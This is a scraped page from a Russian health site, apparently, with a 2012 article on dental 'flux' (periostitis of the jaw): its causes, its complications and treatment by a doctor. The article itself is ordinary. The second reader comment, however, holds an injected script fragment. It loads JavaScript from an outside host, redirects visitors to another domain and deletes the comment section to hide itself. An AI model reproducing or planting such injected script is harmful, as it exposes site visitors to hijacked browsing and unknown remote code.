Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Флюс – однобокая болезнь  >>  Флюс – однобокая болезнь
 
Обратная связь
 

Флюс – однобокая болезнь

Размер шрифта
05 апреля 2012 10:00
  • google_analytics: false
  • Нравится

Плохо чувствовать себя больным. Причем самочувствие человека ухудшается еще больше, если его болезнь видна другим. Что такое флюс, почему он возникает и как избавиться от него?

Суть заболевания

На самом деле, заболевание, которое многие знают как флюс, имеет научное название «остеогенный периостит» – это ограниченное гнойное воспаление надкостницы, которое может быть следствием периодонтита, гингивита, инфекционного заболевания полости рта и носоглотки, когда бактериальная инфекция переходит на надкостницу.

Гной скапливается в нижней или верхней челюсти, человек при этом ощущает распирающие боли, появляется отек и покраснение – все симптомы воспалительного процесса.

Причины заболевания

  • Кариес. При кариесе разрушается зуб, а инфекция попадает в каналы корня зуба и оттуда – под надкостницу. Возникает воспаление периодонта.
  • Гингивит. Воспаление десен тоже может приводить к инфицированию челюсти под надкостницей.
  • Инфекционные заболевания полости рта и носоглотки, например ангина. По той же схеме, как и при гингивите, инфекция попадает вглубь десны, а оттуда – еще глубже.

Почему нужно лечить

Флюс вызывают особые грамотрицательные микробы, часть из которых являются анаэробными, т.е. они способны существовать без доступа воздуха.

  • Лечение флюса необходимо для профилактики распространения инфекции в более глубокие структуры челюсти и возникновения остеомиелита.
  • Запущенный флюс может стать причиной сепсиса, или заражения крови, когда инфекция из челюсти попадает в кровь и распространяется по всему организму.
  • Инфекция через кровь может попасть в головной мозг и вызвать менингит, или воспаление оболочек мозга.

Лечение флюса

Во-первых, стоит помнить, что во время флюса ни в коем случае нельзя прикладывать тепло к очагу воспаления, из-за этого процесс воспаления только усилится.

Обязательно обратитесь к врачу, который назначит грамотное лечение:

  • Вскрытие гнойника, для обеспечения оттока гноя. Пока гной находится в полости, область поражения будет расти, и воспаление останется.
  • Обработка места поражения после удаления гнойника.
  • Прием антибиотиков, которые нужно подбирать с учетом дозировки и эффективности против тех или иных микроорганизмов в зависимости от их штамма.

Как не допустить развития флюса

Обеспечьте грамотный уход за полостью рта и посещайте врача-стоматолога не менее 1 раза в полгода.

Флюс – это бомба с заведенным часовым механизмом, которая может взорваться в любую минуту. Помните об этом и ухаживайте за ротовой полостью.

Сюжеты по теме:
Флюс зуба. Что делать, если щёку "раздуло"

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

05 апреля 2012 в 13:49

Цитировать   |   Пожаловаться

почему в заголовке и в передаче - зубной флюс? сами же пишете, что это воспаление надкостницы, в других местах тела его не бывает. Откуда такой термин?

2 - zzzzzz

30 июня 2015 в 23:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Производители зубных щеток не хотят, чтобы вы это знали!   Выпали зубы – у вас болезнь сердца!   Выбираем зубную щетку   Куда уходят зубы?  
23 апреля 2013Выпали зубы – у вас болезнь сердца! 07 февраля 2012Оптимизм и чувство юмора помогает победить страх перед стоматологом
 
14 ноября 2011Чистка зубов предохраняет от сердечных болезней 14 января 2011Как победить страх перед стоматологом
 

Слайдшоу

1
Все проблемы из-за того, что вы неправильно чистите зубы
Как из Бабы-яги превратиться в красавицу
Еда, которая красит зубы

Тесты

Как правильно чистить зубы
Оцените здоровье ваших зубов
Уход за полостью рта
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.